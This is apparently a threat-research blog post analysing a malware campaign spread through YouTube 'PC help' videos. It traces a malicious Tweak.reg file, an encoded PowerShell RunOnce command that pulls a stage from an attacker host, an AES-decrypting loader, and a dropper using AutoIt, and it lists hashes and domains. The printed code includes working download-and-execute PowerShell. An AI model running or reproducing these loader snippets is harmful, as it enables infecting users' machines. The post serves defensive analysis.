30.07.2024

Ongoing series: #1 #2 #3 #4 #5 #6

next youtube pc help update

After many file-sharing hosts blocked the files from youtube pc help #3, and many new YouTube videos were uploaded, here is the next part of the series. The criminals have moved from generic file hosts to Cloudflare, now hosting their malware themselves. All previously found videos have been updated, and the descriptions now link to their own domain. As before, this domain redirects visitors with residential IPs to a download. However, this download is now hosted directly on Cloudflare on another domain: download.geeksupps[.]com/webdav/reg/file/dl.php.

The Code (Stage 1)

The criminals now deliver a Tweak.reg (SHA256: 28923F781C929115C6A1D8E776B020C1A27964F4A94A2A705910A56D7867465E) file directly, unlike before. This file is again filled with junk but is successfully executed by regedit thanks to the extension and the header Windows Registry Editor Version 5.00. The only new value set here is found in the RunOnce key:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MegaLIMLauncher"="pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA"

This Base64 encoded command is executed by the system once at login. During this process, the next stage (SHA256: 2CD9C1315865F0A9A8DFE68F6FFFC6C1540A8FD6C573D12772C37531D4312CE2) is downloaded from https://pwsh2.pajamas-stoic-failing[.]lol/webdav/reg/DonaldDuck and executed via mshta.

The Not-So-Executable (Stage 2)

As previously described in youtube pc help #2 and youtube pc help #3, the downloaded file is an executable, but the relevant part is encoded and hidden within it as a JavaScript script. Similar to before, several stages of deobfuscation and decoding are necessary to reach the actually interesting layer. For example, the powershell payload is encrypted via AES and the key 49594972696A6F7A574A594775414161.

$oGLwg = [System.Security.Cryptography.Aes]::Create();
$oGLwg.Key = UubizRsX('49594972696A6F7A574A594775414161');
$oGLwg.IV  = New-Object byte[] 16;
$wAhZRwwS = $oGLwg.CreateDecryptor();
$DEfgAUHIW = $wAhZRwwS.TransformFinalBlock($prGtwv, 0, $prGtwv.Length);
$ZjHqoEPsc = [System.Text.Encoding]::Utf8.GetString($DEfgAUHIW);
$wAhZRwwS.Dispose();

The decrypted source contains four PowerShell functions to decode, download, and execute the next stage. If not already present, mms_mini.exe (SHA256:E11DC8D2E7FBA91857DF6A38C6E64AD491A9271B9F0BFDA937680DD0DA453665) is downloaded from the same folder as before, saved in the user’s TEMP folder, and then executed.

function Mdr(){
    $kbx = $env:Temp + '\';
    $pRBSWprbzGM = $kbx + 'mms_mini.exe';
    if (Test-Path -Path $pRBSWprbzGM){
        rvQ $pRBSWprbzGM;
    }
    Else { 
        $MdSmylcFUAm = zmB (xiu @(3807,3819,3819,3815,3818,3761,3750,3750,3815,3822,3818,3807,3753,3749,3815,3800,3809,3800,3812,3800,3818,3748,3818,3819,3814,3808,3802,3748,3805,3800,3808,3811,3808,3813,3806,3749,3811,3814,3811,3750,3822,3804,3801,3803,3800,3821,3750,3817,3804,3806,3750,3812,3812,3818,3798,3812,3808,3813,3808,3749,3804,3823,3804));
    GKF $pRBSWprbzGM $MdSmylcFUAm;
    rvQ $pRBSWprbzGM
    };
}

The Dropper Payload (Stage 3)

This executable will drop and execute several files on the system, including:

  • a legitimate AutoIT3.exe to execute an obfuscated script
  • the script Linda.bat (SHA256: C696C636CF51D283CD5EFA2AFD82345AD3CC2CA8C84074138FE57CD71C7055F4), obfuscated via Abobus
  • a compiled AutoIt file for the actual functionality: Grigori.a3x (SHA256: 24CF8C2860413DE82531F80A2F93920D6C682DC31312D888B2F128FC0190CA03)